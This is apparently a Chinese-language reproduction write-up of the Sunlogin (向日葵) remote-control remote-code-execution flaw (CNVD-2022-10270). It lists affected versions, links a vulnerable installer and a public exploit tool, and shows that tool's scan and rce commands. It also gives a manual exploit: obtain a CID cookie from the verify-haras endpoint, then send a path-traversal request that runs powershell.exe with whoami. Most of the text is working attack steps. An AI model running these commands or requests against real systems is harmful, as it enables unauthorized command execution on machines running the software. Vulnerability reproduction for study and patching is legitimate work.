向日葵简约版漏洞地址:https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672

向日葵个人版for Windows:https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270

影响版本

向日葵个人版for Windows <= 11.0.0.33

向日葵简约版 <= V1.0.1.43315 (2021.12)

环境

环境我用的是10.3.0.27372版本下载地址:https://wwi.lanzouy.com/irKi301jjype

检测与利用工具:https://github.com/Mr-xn/sunlogin_rce/releases/tag/new

解压赠予执行权限

image-20220316143203180

漏洞复现

工具使用说明

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
 zss@zss>>> ./xrkRce


╔═╗┬ ┬┌┐┌╦ ┌─┐┌─┐┬┌┐┌ ╦═╗┌─┐┌─┐
╚═╗│ ││││║ │ ││ ┬││││───╠╦╝│ ├┤
╚═╝└─┘┘└┘╩═╝└─┘└─┘┴┘└┘ ╩╚═└─┘└─┘

by:T00ls.net
向日葵Rce
----------------------------------------------

Usage of ./xrkRce:
-c string //要执行的命令
cmd
-h string //目标ip
ip
-p string //指定扫描端口默认40000-65535
port:40000-65535 (default "40000-65535")
-t string //执行模式默认扫描模式(scan) 代码执行模式(rce)
type (default "scan")
-x int //指定线程默认1000
x (default 1000)

目标扫描

1
./xrkRce -h  192.168.0.107  -t scan

代码执行

1
./xrkRce -h  192.168.0.107  -t rce -p 49180 -c "ipconfig"

image-20220316144524778

手动

浏览器访问以下地址,获取其Cookie值

url:http://ip:端口/cgi-bin/rpc?action=verify-haras

image-20230411185109821

访问以下地址并使用BP抓包在其添加上Cookie信息,进行漏洞验证

1
2
3
http://192.168.50.223:49843/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami

Cookie:CID=PEYMEjYeyKrFKyNqn18536BWNYfLDz25